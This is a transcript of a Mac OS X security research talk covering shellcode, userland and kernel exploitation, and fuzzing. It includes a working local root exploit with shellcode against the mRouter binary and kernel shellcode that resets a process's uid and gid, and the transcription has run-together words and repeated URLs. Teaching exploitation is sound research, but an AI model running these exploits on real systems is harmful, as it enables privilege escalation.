breaking mac osx
TRANSCRIPT
-
8/13/2019 Breaking Mac Osx
1/71
Breaking Mac OS X
By Neil Archibald
and Ilja van Sprundel
-
8/13/2019 Breaking Mac Osx
2/71
Who am I? Neil Archibald, Senior
Security Researcher @ Suresec Ltd
Interested in Mac OSX sys-internals
and research for roughly two years.
Introduction
Ilja van Sprundel
Works for Suresec
Working with unix for a few
years.
Breaks stuff for fun and profit :)
Intrigued by operating systeminternals.
-
8/13/2019 Breaking Mac Osx
3/71
What is Mac OS X?
A modern Operating system
A graphical user interface
Lots of userland applications
Runs on ppc architecture. (will run on intel).
Mac OS X has grown significantly in market share.
OSXserver:/tmp ilja$ uname -aDarwin OSXserver 7.0.0 Darwin Kernel Version 7.0.0: Wed
Sep 24 15:48:39 PDT 2003; root:xnu/xnu-
517.obj~1/RELEASE_PPC Power Macintosh powerpc
-
8/13/2019 Breaking Mac Osx
4/71
Tools
gdbGnu Debugger,
otoolobjdump and ldd replacement.
class-dumpDump objective c classinfo
IDA Prothe best disassembler around
HTEuseful for manipulating objectfiles.
-
8/13/2019 Breaking Mac Osx
5/71
Shellcode Tips
Some of the hurdles which a shellcoder
must typically overcome are:
Code must be position independent.
Typically filters exist on the bytes whichare allowed to be used in the shellcode.
(usually a NULL byte is disallowed)
In threaded applications code mustfork()to remain stable.
-
8/13/2019 Breaking Mac Osx
6/71
PPC Assembly
32 bit instructions. Makes it easy to countoffsets for relative jumps. Makes for largeshellcode.
Endian: little or big endian, typically big. System calls return to the instruction
directly below the sc instruction on
failure, or one instruction past that forsuccess.
PPCExplain++
-
8/13/2019 Breaking Mac Osx
7/71
Shellcode TipsP.I.C
x86 jmp call pop replacements.Example 1:
Example 2:
bcl 20,31,i_want_this
i_want_this:mflr r3
_main:xor. r5,r5,r5
bnel _mainmflr r30
-
8/13/2019 Breaking Mac Osx
8/71
Shellcode TipsNULL bytes.
sc instruction = 0x44000002
Reserved bits shown.
It can be replaced with: 0x44ffff02
-
8/13/2019 Breaking Mac Osx
9/71
Shellcode TipsNULL bytes
nop instruction is recommended as:
ori 0,0,0= 0x60000000
Can be replaced with:ori r0,r3,24672= 0x60606060
-
8/13/2019 Breaking Mac Osx
10/71
Shellcode TipsNULL bytes
li instruction is really addi with 0 as rA. If the number required in a register is too small
a null byte will occur.
We can add a number to our value to make itlarge enough to avoid null bytes.
We then subtract the same value to leave ourrequired number.
-
8/13/2019 Breaking Mac Osx
11/71
Shellcode Tips - alignment
Since each instruction is 4 bytes,shellcode must be correctly word aligned
in memory.
-
8/13/2019 Breaking Mac Osx
12/71
Intel (x86) Architecture
Hopefully you arefamiliar with x86architecture!
Shellcode is prettymuch the same asFreeBSD. In fact, mostFreeBSD shellcode willwork pretty much thesame on osx86 asFreeBSD withoutmodification.
-
8/13/2019 Breaking Mac Osx
13/71
Mac OSX Intel - Syscall calling convention
The int $0x80 instruction can be used to enterkernel mode to execute a syscall. Also the lcallinstruction can be used.
gcc generally uses lcall. Syscall number in eax. Arguments are passed on
the stack in reverse order.
An extra dummy byte must be pushed to the stack.This is because typically a code stub is used suchas: call kernel:
int $0x80
ret
-
8/13/2019 Breaking Mac Osx
14/71
Shellcode Tipsfork()
HD Moore release a paperon Mac OS X shellcode.
The execve()functionreturns EOPNOTSUPPif aprocess has more than oneactive thread.
To counter this reliable
shellcode on Mac OS X mustfork()before callingexecve().
-
8/13/2019 Breaking Mac Osx
15/71
Architecture Spanning Shellcode.
Shellcode which will run on more than onearchitecture.
Applies to Mac OS X, now that the move toIntel is in process.
Phrack article on this subject:http://www.phrack.org/phrack/57/p57-0x0e
http://www.phrack.org/phrack/57/p57-0x0ehttp://www.phrack.org/phrack/57/p57-0x0ehttp://www.phrack.org/phrack/57/p57-0x0ehttp://www.phrack.org/phrack/57/p57-0x0e -
8/13/2019 Breaking Mac Osx
16/71
CLDInstruction (Clear Direction Flag). Onlymodifies the direction flag, no memory access. Hasthe op code 0xfcon x86 architecture.
The fnmsubinstruction (floating negative multiply-subtract) on ppc architecture does the following:
frD,frA,frC,frB = -((frA*frC)-frB) -> frD
Therefore also performs no memory access or
changes to significant registers. It has the opcodefnmsub f7,f28,f19,f31 == 0xfcfcfcfc
This means 0xfcfcfcfcwill work as a multi-archNOP instruction between ppc and x86.
Architecture Spanning ShellcodeNOP Sled
-
8/13/2019 Breaking Mac Osx
17/71
Architecture Spanning ShellcodePPC / x86
Trick: find an instruction on ppc which will donothing, but end in a jump instruction on x86.
Magic Instruction: 0x5f90eb48
X86:5f == pop %edi90 == nop
eb 48 == jmp $0x48 (bytes) PPC:
5f 90 eb 48 == rlwnm r16,r28,r29,13,4
-
8/13/2019 Breaking Mac Osx
18/71
Architecture Spanning Shellcode.
When execution hitsthis instruction on an
x86 processor, it will
jump 0x48 bytesforward over the ppc
shellcode.
If a ppc processor
interprets thisinstruction is will run
directly into the ppc
code.
5f 90 eb 48
PPC SHELLCODE
X86 SHELLCODE
0x48
Bytes
-
8/13/2019 Breaking Mac Osx
19/71
-
8/13/2019 Breaking Mac Osx
20/71
Mach-o format
- Overview
- Header files to read./usr/include/mach-o/*
- Manipulating with HTE
Slides available fromSySCAN05 inreferences.
-
8/13/2019 Breaking Mac Osx
21/71
Auditing Mac OS X
Open Source Darwin Components
Closed source applications (Most of theGUI).
-
8/13/2019 Breaking Mac Osx
22/71
Code Auditing
Open source code for the Darwincomponent is available from:
http://developer.apple.com/darwin/
greping for APPLE or XXX can beuseful to find the changes Apple have
made.
http://developer.apple.com/darwin/http://developer.apple.com/darwin/ -
8/13/2019 Breaking Mac Osx
23/71
Reverse Engineering
IDAAdvanced for PPC/mach-o
class-dump for Objective-C binaries. (OBJsegment).
Phrack (61) paper onreverse engineeringon Mac OSX usinggnu debugger (gdb).
-
8/13/2019 Breaking Mac Osx
24/71
Debugging Tricks!
- Hidden Functions(GDBComponentList|| CFShow).http://developer.apple.com/technotes/tn2004/tn2124.html#LISTCALLFUNC
MacsBug Environment variables
(MallocStackLogging. Etc)
Antidebug - beating ptrace()protection.
http://developer.apple.com/technotes/tn2004/tn2124.htmlhttp://developer.apple.com/technotes/tn2004/tn2124.html -
8/13/2019 Breaking Mac Osx
25/71
Shared Library Redirection
DYLD_FRAMEWORK_PATHColon separatedlist of directories that contain frameworks.
DYLD_LIBRARY_PATHColon deliminated list
of directories containing shared libraries. DYLD_INSERT_LIBRARYInsert a single .so
into the process space. (Requires
DYLD_FORCE_FLAT_NAMESPACE)
-
8/13/2019 Breaking Mac Osx
26/71
Buffer Overflow (stack)
Hopefully everyone is familiar with the conceptof a stack based buffer overflow on x86architecture.
LR (Link Register)Used for storage of returnaddress.
blr instruction (branch to link register) is theequivalent to the x86 ret instruction.
BUFFER EBP EIP
OVERFLOW
-
8/13/2019 Breaking Mac Osx
27/71
Buffer Overflow (Stack Layout)
Stack grows downtowards lower memoryaddresses.
When two function callsdeep, LR must bestored somewhere(stack).
Possible to overwritestored LR to gaincontrol.
-
8/13/2019 Breaking Mac Osx
28/71
Buffer Overflow (return address calculation)
A similar technique to that shown in phrack
(Smashing the stack for fun and profit):
Also the address can be calculated exactly
when stored in an environment variable:
int sp (void) {
__asm__("mr r0, r1");}
unsigned int ret = 0xbffffffa - strlen(shellcode);
char *args[] = { VULNPROG, "-v", "-a", filler, NULL };
char *env[] = {"TERM=xterm", shellcode, NULL };
-
8/13/2019 Breaking Mac Osx
29/71
Buffer Overflow (fm-iSink.c)#define VULNPROG
"/System/Library/SyncServices/SymbianConduit.bundle/Contents/Resources/mRouter"
#define MAXBUFSIZE 4096
char shellcode[] = // Shellcode by b-r00t, modified by nemo.
"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x39\x40\x01\xc3\x38\x0a\xfe\xf4"
"\x44\xff\xff\x02\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7c\x68\x02\xa6\x38\x63\x01\x60"
"\x38\x63\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8"
"\x3b\xc0\x01\x47\x38\x1e\xfe\xf4\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x3b\xc0\x01\x0d\x38\x1e\xfe\xf4\x44\xff\xff\x02\x2f\x62\x69\x6e"
"\x2f\x73\x68";
char filler[MAXBUFSIZE];
int main(int ac, char **av)
{
unsigned int ret = 0xbffffffa - strlen(shellcode);
char *args[] = { VULNPROG, "-v", "-a", filler, NULL };
char *env[] = { "TERM=xterm", shellcode, NULL };
memset(filler,(char)'A',sizeof(filler));
memcpy(filler+MAXBUFSIZE-5,&ret,4);
execve(*args, args,env);
return 0;
}
-
8/13/2019 Breaking Mac Osx
30/71
Format string bugs(intro)
Introduction (misuse of a function withvariable arguments).
Mac OS X is big endian. Writes are madein the opposite direction to x86.
Exploiting a format string typically givesyou a write anything anywhere primitive.
printf(buffer);
-
8/13/2019 Breaking Mac Osx
31/71
Format string bugs(__cleanup)
/** Exit, flushing stdio buffers if necessary.
*/
void
exit(status)
int status;
{
struct atexit *p;
int n;
/* Ensure that the auto-initialization routine is linked in: */
extern int _thread_autoinit_dummy_decl;
_thread_autoinit_dummy_decl = 1;
for (p = __atexit; p; p = p->next)for (n = p->ind; --n >= 0;)
(*p->fns[n])();
if (__cleanup)(*__cleanup)();
_exit(status);
}
-
8/13/2019 Breaking Mac Osx
32/71
Format string bugs(PIC stub)
PIC stubs generated:
Table of function pointers filled in by the dyld.
We can overwrite these function pointers to gain controlof execution,
Note: Address of these function pointers contain nullbytes, which makes writing to them more difficult.
(gdb) x/8i 0x2d40
0x2d40 : mflr r0
0x2d44 : bcl- 20,4*cr7+so,0x2d48
0x2d48 : mflr r11
0x2d4c : addis r11,r11,0
0x2d50 : mtlr r0
0x2d54 : lwzu r12,840(r11)0x2d58 : mtctr r12
0x2d5c : bctr
-
8/13/2019 Breaking Mac Osx
33/71
Heap Overflow - malloc() Overview
Made up of multiple zones. Most softwareonly uses the default zone.
Different sized allocations come from
different regions or bins. Zone meta-data stored just after the large
memory block bin.
When large memory is allocatedvm_allocate()is used. This eventuallyreaches the zone meta-data.
-
8/13/2019 Breaking Mac Osx
34/71
-
8/13/2019 Breaking Mac Osx
35/71
Heap Overflow - continued
The szone_tstruct stored after the large
memory block bin contains function
pointers for each of the zones allocation
and deallocation functions.
If we can overwrite this struct, the next callto any of the heap functions will result in
control of execution.
-
8/13/2019 Breaking Mac Osx
36/71
Heap OverflowBugs
The WebKit library used by Safari and Mail.appis prone to bugs which can be exploited in thismanner.
Because of the fact that web pages can beprovided by the attacker, calls to malloc() can beorchestrated to cleave the way to the zonestruct.
For full details on this technique read:
http://www.phrack.org/phrack/63/p63-0x05_OSX_Heap_Exploitation_Technqiues.txt
-
8/13/2019 Breaking Mac Osx
37/71
Race Conditions
File races are common on Mac OSX
Exploited in the same way as other Unixplatforms.
Apple implemented a super stat()function.Without creating an equivalent to operate on an
open file handle.
DESCRIPTION
The getattrlist() function returns attributes (that is, metadata) of file
system objects. You can think of getattrlist()as a seriously enhancedversion of stat(2). The function returns attributes about the file sys-tem object specified bypath in the buffer specified by attrBufandattrBufSize. The attrList parameter determines what attributes are
returned. The options parameter lets you control specific aspects of the
function's behaviour.
-
8/13/2019 Breaking Mac Osx
38/71
The 80s Called they want their bugs
-
8/13/2019 Breaking Mac Osx
39/71
The 80 s Called, they want their bugsback!!!!
Low hanging fruit!
dsidentity bug, getenv(USER);??
malloc()bug, MALLOC_LOG_FILE
environment variable.char *envStr = nil;
envStr = getenv("USER");
//check for member of admingroup
if ( (envStr != nil) &&UserIsMemberOfGroup( inDSRef,
inDSNodeRef, envStr, "admin" ) )
{
return true;
}
-
8/13/2019 Breaking Mac Osx
40/71
dyld bug.static const char* sFrameworkFallbackPaths[] = { "$HOME/Library/Frameworks",
"/Library/Frameworks"
, "/Network/Library/Frameworks", "/System/Library/Frameworks", NULL };static const char* sLibraryFallbackPaths[] = { "$HOME/lib", "/usr/local/lib", "/usr/lib", NULL };
...
// default value for DYLD_FALLBACK_FRAMEWORK_PATH, if not set in environment
if ( sEnv.DYLD_FALLBACK_FRAMEWORK_PATH == NULL ) {
const char** paths = sFrameworkFallbackPaths;
if ( home != NULL ) {
if ( riskyUser() )removePathWithPrefix(paths, "$HOME");
else
paths_expand_roots(paths, "$HOME", home);
}
sEnv.DYLD_FALLBACK_FRAMEWORK_PATH = paths;
}
// default value for DYLD_FALLBACK_LIBRARY_PATH, if not set in environmentif ( sEnv.DYLD_FALLBACK_LIBRARY_PATH == NULL ) {
const char** paths = sLibraryFallbackPaths;
if ( home != NULL ) {
if ( riskyUser() )
removePathWithPrefix(paths, "$HOME");
else
paths_expand_roots(paths, "$HOME", home);
}
sEnv.DYLD_FALLBACK_LIBRARY_PATH = paths;}
-
8/13/2019 Breaking Mac Osx
41/71
Return to libSystem
Most people run softwareupdate` regularly,therefore most people are running the exactsame binaries. This makes returning into thebinary itself reliable.
Calling convention: Function arguments arepassed in the general purpose registers, startingwith r3.
otool tv can be used to dump anassembly listing of a binary. To find instructionswhich are needed.
-
8/13/2019 Breaking Mac Osx
42/71
Return to libSystem
The lmw instruction is most useful, however itis very rare to find this instruction in a binary,starting loading from the r3, register.
An example of some instructions which we coulduse are:
getusershell()will store the shell of the currentuser in r3.
// [/usr/lib/libSystem.B.dylib]
//9001b88c lwz r3,0x38(r1)
//9001b890 addi r1,r1,0x60
//9001b894 lwz r0,0x8(r1)
//9001b898 lmw r29,0xfff4(r1)
//9001b89c mtspr lr,r0
//9001b8a0 blr
-
8/13/2019 Breaking Mac Osx
43/71
What is Darwin?
A part of Mac OS X
An operating system on itself
Unix based
Userland applications and a
kernel
Runs on ppc and i386
-
8/13/2019 Breaking Mac Osx
44/71
-
8/13/2019 Breaking Mac Osx
45/71
-
8/13/2019 Breaking Mac Osx
46/71
-
8/13/2019 Breaking Mac Osx
47/71
Example ifr.ifr_name
doesnt getinitialized.
strcpy()leaves
part of ifr_nameuninitialized.
Data is
copyout()d touserspace.
static int ifconf(u_long cmd, user_addr_t ifrp, int * ret_space) {
struct ifaddr *ifa;
struct ifreq ifr;
...
space = *ret_space;
for (ifp = ifnet_head.tqh_first; space > sizeof(ifr) && ifp;
ifp = ifp->if_link.tqe_next) {
char workbuf[64];
size_t ifnlen, addrs;
ifnlen = snprintf(workbuf, sizeof(workbuf),
"%s%d", ifp->if_name, ifp->if_unit);
...
strcpy(ifr.ifr_name, workbuf);...
ifa = ifp->if_addrhead.tqh_first;
for ( ; space > sizeof (ifr) && ifa;
ifa = ifa->ifa_link.tqe_next) {
struct sockaddr *sa = ifa->ifa_addr;
addrs++;
if (sa->sa_len
-
8/13/2019 Breaking Mac Osx
48/71
-
8/13/2019 Breaking Mac Osx
49/71
Stack based buffer overflows in the darwin kernel.
There are a few
The same rules apply (mentioned earlier)
A few differences when comparing toexploiting them in userland.
The goal is the same, get a shell withelevated privileges.
Stack based buffer overflows in the
-
8/13/2019 Breaking Mac Osx
50/71
Stack based buffer overflows in the
darwin kernel: kernel shellcode
Unlike userland shellcode, we cannot just callexecve().
We can change the user id and group id of aprocess.
Each process has its own process structuresomewhere in memory.
Among other things it stored the userid and
groupid. All our shellcode has to do is find this struct and
modify the uid and gid.
Stack based buffer overflows in the
-
8/13/2019 Breaking Mac Osx
51/71
Stack based buffer overflows in the
darwin kernel: kernel shellcode (2)
Finding the process structure of a processis easier than you would think.
This can be done with the sysctl() call
before you exploit anything.long get_addr(pid_t pid) {
int i, sz = sizeof(struct kinfo_proc),
mib[4];
struct kinfo_proc p;
mib[0] = 1;
mib[1] = 14;
mib[2] = 1;
mib[3] = pid;
i = sysctl(&mib, 4, &p, &sz, 0, 0);
if (i == -1) {
perror("sysctl()");
exit(0);
}
return(p.kp_eproc.e_paddr);}
-
8/13/2019 Breaking Mac Osx
52/71
Stack based buffer overflows in the
-
8/13/2019 Breaking Mac Osx
53/71
Stack based buffer overflows in the
darwin kernel: kernel shellcode (4)
Basic darwin kernel shellcode:
Int kshellcode[] = {
0x3ca0aabb, // lis r5, 0xaabb
0x60a5ccdd, // ori r5, r5, 0xccdd
0x80c5ffa8, // lwz r6, -88(r5)
0x80e60048, // lwz r7, 72(r6)
0x39000000, // li r8, 0
0x9106004c, // stw r8, 76(r6)
0x91060050, // stw r8, 80(r6)0x91060054, // stw r8, 84(r6)
0x91060058, // stw r8, 88(r6)
0x91070004 // stw r8, 4(r7)
}
Address obtained with sysctl
-
8/13/2019 Breaking Mac Osx
54/71
-
8/13/2019 Breaking Mac Osx
55/71
Stack based buffer overflows in the
-
8/13/2019 Breaking Mac Osx
56/71
Stack based buffer overflows in the
darwin kernel: The vulnerability. There is a length check done
on nsops. Nsops is signed howeverthere is no check to see if itsnegative.
Copyin() copies data fromuserland to kernel space.
First argument is a userlandaddress. Second argument is a kernel
address.
Third argument is the size. The size used will be
interpreted as unsigned. When negative values are
cast to unsigned they areHUGE!!!
Hence a buffer overflow cantake place.
struct semop_args {
int semid;
struct sembuf *sops;int nsops;
};
int
semop(p, uap, retval)
struct proc *p;
register struct semop_args *uap;register_t *retval;
{
int semid = uap->semid;
int nsops = uap->nsops;
struct sembuf sops[MAX_SOPS];
...
if (nsops > MAX_SOPS) {
UNLOCK_AND_RETURN(E2BIG);}
if ((eval = copyin(uap->sops, &sops,
nsops * sizeof(sops[0]))) != 0) {
UNLOCK_AND_RETURN(eval);
}
...}
Stack based buffer overflows in the
-
8/13/2019 Breaking Mac Osx
57/71
Stack based buffer overflows in thedarwin kernel: copyin problem
Problem, were copying WAY too much andstack space will run out eventually.
Copyin() however does several tests on the
userland address. One of them is to stop copying the moment data
can no longer be read from it.
This can be used to our advantage.
Well copy the amount of data needed and thenhave an unreadable page, right after it!
Kernel bugs allowing userland
-
8/13/2019 Breaking Mac Osx
58/71
Kernel bugs allowing userlandcompromise.
Not all bugs in the kernel are exploitedonly in the kernel.
Some require userland interaction.
Examples: a few ptrace() exploits. FD0,1,2 closing bugs,
-
8/13/2019 Breaking Mac Osx
59/71
Kernel bugs allowing userland
-
8/13/2019 Breaking Mac Osx
60/71
g gcompromise. setrlimit() (2)
int dosetrlimit(p, which, limp)
struct proc *p;
u_int which;
struct rlimit *limp;
{
register struct rlimit *alimp;
...
alimp = &p->p_rlimit[which];
if (limp->rlim_cur > alimp->rlim_max ||
limp->rlim_max > alimp->rlim_max)
if (error = suser(p->p_ucred, &p->p_acflag))
return (error);
...
switch (which) {
...
case RLIMIT_NOFILE:
/*
* Only root can set the maxfiles limits, as it is
systemwide resource
*/
if ( is_suser() ) {
if (limp->rlim_cur > maxfiles)
limp->rlim_cur = maxfiles;
if (limp->rlim_max > maxfiles)
limp->rlim_max = maxfiles;
}
else {if (limp->rlim_cur > maxfilesperproc)
limp->rlim_cur = maxfilesperproc;
if (limp->rlim_max > maxfilesperproc)
limp->rlim_max = maxfilesperproc;
}
break;
...
}
}
Kernel bugs allowing userland
-
8/13/2019 Breaking Mac Osx
61/71
g gcompromise. setrlimit() (3)
All values used are signed Negative rlimits can be used
Will pass all super user checks
When comparisons are done in other pieces ofcode out there is always unsigned cast.
We can open a lot more files then initiallyintended (there is still a system limit that will be
enforced !) A denial of service using dup2() is possible
Getdtablesize() will return a negative value.
Kernel bugs allowing userland
-
8/13/2019 Breaking Mac Osx
62/71
g gcompromise. setrlimit() (4)
Getdtablesize() returns the
maximum amount of filedescriptors that a processcan have open.
A lot of programs use this ina for() loop to close all openfile descriptors beforespawning another process.
One of these is pppd whichis suid root and opens a lot
of interesting files. File descriptors and rlimits
get inherited throughexecve().
intgetdtablesize(p, uap, retval)
struct proc *p;
void *uap;
register_t *retval;
{
*retval = min((int)p-
>p_rlimit[RLIMIT_NOFILE].rlim_cur,
maxfiles);
return (0);}
-
8/13/2019 Breaking Mac Osx
63/71
-
8/13/2019 Breaking Mac Osx
64/71
-
8/13/2019 Breaking Mac Osx
65/71
What is fuzzing
Using semi-valid data: good enough topass initial checks, bad enough so thingsmight go wrong.
Can be used in a lot of things Well only discuss fuzzing related to the
xnu kernel.
What can you fuzz: Syscall arguments Binary files the kernel has to process
-
8/13/2019 Breaking Mac Osx
66/71
Syscall argument fuzzing
Generate a random syscall number OSX also has some negative syscall numbers. All syscalls have at most 8 arguments (special
case: one mach syscall has 9 arguments)
Generate 8 random arguments random:
Some random number A valid userland address
Get some (random) data on it Address of an unmapped page
-
8/13/2019 Breaking Mac Osx
67/71
More detailed argument fuzzing
The previous method is trivial and not detailed atall, bug can be implemented in a matter of
minutes.
You can do more detailed syscall fuzzing Examples
socket() fuzzing Once the socket is made then all sorts of socket operations
are made on it. Setsockopt
Getsockopt
Bind
-
8/13/2019 Breaking Mac Osx
68/71
Binary file fuzzing
Unintelligent file fuzzing Take a valid file Randomly modify some bytes VERY EASY
SHOCKING RESULTS Intelligent fuzzing Can take a while to make something decent Need to know the specifics of the kind of file parsing that youre
going to fuzz.
What can you fuzz with it: Mach-o runtime .dmg image file loading
You should check out Michael Sutton and AdamGreenes slides from blackhat.
-
8/13/2019 Breaking Mac Osx
69/71
MYTHBUSTERS
OSX is super securebecause is has no rootuser!
To gain root on an OSX
machine the user needs toenter his/her password!
OSX has a magicalprotective barrier whichmakes it impossible to beinfected by a virus!
No Mac OSX box has everbeen hacked!
-
8/13/2019 Breaking Mac Osx
70/71
References
http://en.wikipedia.org/wiki/PowerPC
http://felinemenace.org/~nemo/ppcasm/
http://uninformed.org/?v=1&a=1&t=pdf
http://developer.apple.com/darwin/
http://en.wikipedia.org/wiki/PowerPChttp://felinemenace.org/~nemo/ppcasm/http://uninformed.org/?v=1&a=1&t=pdfhttp://developer.apple.com/darwin/http://developer.apple.com/darwin/http://uninformed.org/?v=1&a=1&t=pdfhttp://felinemenace.org/~nemo/ppcasm/http://en.wikipedia.org/wiki/PowerPC -
8/13/2019 Breaking Mac Osx
71/71